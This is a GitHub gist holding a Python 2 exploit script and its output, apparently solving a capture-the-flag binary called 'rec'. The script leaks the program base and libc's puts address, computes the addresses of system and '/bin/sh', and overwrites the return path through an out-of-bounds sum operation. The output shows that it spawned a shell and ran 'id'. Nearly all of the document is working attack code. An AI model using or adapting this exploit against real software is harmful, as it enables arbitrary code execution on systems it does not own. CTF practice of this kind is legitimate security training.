Skip to content

Instantly share code, notes, and snippets.

@inaz2
Created January 2, 2017 09:04
Show Gist options
  • Save inaz2/e9cc494924e7e914c6324b280d44de74 to your computer and use it in GitHub Desktop.
Save inaz2/e9cc494924e7e914c6324b280d44de74 to your computer and use it in GitHub Desktop.
$ python rec.py
[+] bin_base = 56580000
[+] libc_puts = f759f140
[+] libc_system = f757a940
[+] libc_binsh = f7698e8b
[+] got a shell!
id
uid=1000(user) gid=1000(user) groups=1000(user),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),115(lpadmin),116(sambashare),999(docker)
from minipwn import *
def read_note(s):
recvuntil(s, '> ')
sendline(s, '1')
recvuntil(s, 'Your note: ')
note = recvline(s)
return note
def polish_sum(s, operands):
recvuntil(s, '> ')
sendline(s, '2')
recvuntil(s, 'Operator: ')
sendline(s, 'S')
for operand in operands:
recvuntil(s, 'Operand: ')
sendline(s, str(operand))
recvuntil(s, 'Operand: ')
sendline(s, '.')
recvuntil(s, 'Sum: ')
_sum = recvline(s)
return int(_sum)
def sign(s, value):
recvuntil(s, '> ')
sendline(s, '5')
sendline(s, str(value))
s = connect_process(['./rec_7743d76881fe811335ca25d8b0a3c5f54a21e2f1'])
#raw_input()
note = read_note(s)
bin_base = u32(note[4:8]) - 0x6fb
print "[+] bin_base = %x" % bin_base
plt_puts = bin_base + 0x520
got_puts = bin_base + 0x2fd8
values = range(0x63) + [plt_puts, got_puts]
polish_sum(s, values)
sign(s, 0)
"""
$ nm -D /lib32/libc.so.6 | grep -e puts$ -e system$
0005f140 W puts
0003a940 W system
$ strings -tx /lib32/libc.so.6 | grep /bin/sh
158e8b /bin/sh
"""
data = recvline(s)
libc_puts = u32(data[:4])
print "[+] libc_puts = %x" % libc_puts
libc_system = libc_puts - 0x0005f140 + 0x0003a940
libc_binsh = libc_puts - 0x0005f140 + 0x158e8b
print "[+] libc_system = %x" % libc_system
print "[+] libc_binsh = %x" % libc_binsh
def u2s(x):
"""unsigned int to signed int"""
s = struct.pack('<I', x)
return struct.unpack('<i', s)[0]
values = range(0x63) + [u2s(libc_system), u2s(libc_binsh)]
polish_sum(s, values)
sign(s, 0)
print "[+] got a shell!"
interact(s)
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment